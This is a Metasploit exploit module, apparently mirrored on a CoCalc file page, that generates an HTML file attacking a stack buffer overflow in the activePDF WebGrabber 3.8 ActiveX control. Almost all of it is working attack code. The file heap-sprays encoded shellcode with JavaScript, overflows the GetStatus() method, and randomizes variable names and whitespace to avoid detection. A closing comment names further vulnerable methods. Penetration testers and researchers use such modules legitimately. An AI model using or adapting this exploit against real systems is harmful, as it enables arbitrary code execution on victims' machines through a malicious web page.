CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/fileformat/activepdf_webgrabber.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = LowRanking78include Msf::Exploit::FILEFORMAT910def initialize(info = {})11super(update_info(info,12'Name' => 'activePDF WebGrabber ActiveX Control Buffer Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When15sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)16an attacker may be able to execute arbitrary code. This control is not marked safe17for scripting, so choose your attack vector accordingly.1819},20'License' => MSF_LICENSE,21'Author' => [ 'MC' ],22'References' =>23[24[ 'OSVDB', '64579'],25[ 'URL', 'http://www.activepdf.com/products/serverproducts/webgrabber/' ],26],27'DefaultOptions' =>28{29'EXITFUNC' => 'process',30'DisablePayloadHandler' => true31},32'Payload' =>33{34'Space' => 1024,35'BadChars' => "\x00",36},37'Platform' => 'win',38'Targets' =>39[40[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]41],42'DisclosureDate' => '2008-08-26',43'DefaultTarget' => 0))4445register_options(46[47OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),48])49end5051def exploit52# Encode the shellcode.53shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))5455# Create some nops.56nops = Rex::Text.to_unescape(make_nops(4))5758# Set the return.59ret = Rex::Text.uri_encode([target.ret].pack('L'))6061# Randomize the javascript variable names.62vname = rand_text_alpha(rand(100) + 1)63var_i = rand_text_alpha(rand(30) + 2)64rand1 = rand_text_alpha(rand(100) + 1)65rand2 = rand_text_alpha(rand(100) + 1)66rand3 = rand_text_alpha(rand(100) + 1)67rand4 = rand_text_alpha(rand(100) + 1)68rand5 = rand_text_alpha(rand(100) + 1)69rand6 = rand_text_alpha(rand(100) + 1)70rand7 = rand_text_alpha(rand(100) + 1)71rand8 = rand_text_alpha(rand(100) + 1)7273content = %Q|<html>74<head>75<script>76try {77var #{vname} = new ActiveXObject('APWebGrabber.Object');78var #{rand1} = unescape('#{shellcode}');79var #{rand2} = unescape('#{nops}');80var #{rand3} = 20;81var #{rand4} = #{rand3} + #{rand1}.length;82while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};83var #{rand5} = #{rand2}.substring(0,#{rand4});84var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});85while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};86var #{rand7} = new Array();87for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }88var #{rand8} = "";89for (#{var_i} = 0; #{var_i} < 800; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }90#{vname}.GetStatus(#{rand8},1);91} catch( e ) { window.location = 'about:blank' ; }92</script>93</head>94</html>95|9697content = Rex::Text.randomize_space(content)9899print_status("Creating '#{datastore['FILENAME']}' file ...")100101file_create(content)102end103end104105=begin106107Other methods that are vulnerable.108109[id(0x00000050), helpstring("Clean up after a WWWPrint call.")]110void CleanUp(BSTR ServerIPAddress, long ServerPort);111112[id(0x00000055)]113BSTR Wait(BSTR IPAddress, long PortNumber, short WaitTime, BSTR AcceptedCommands);114115...and probably more.116=end117118119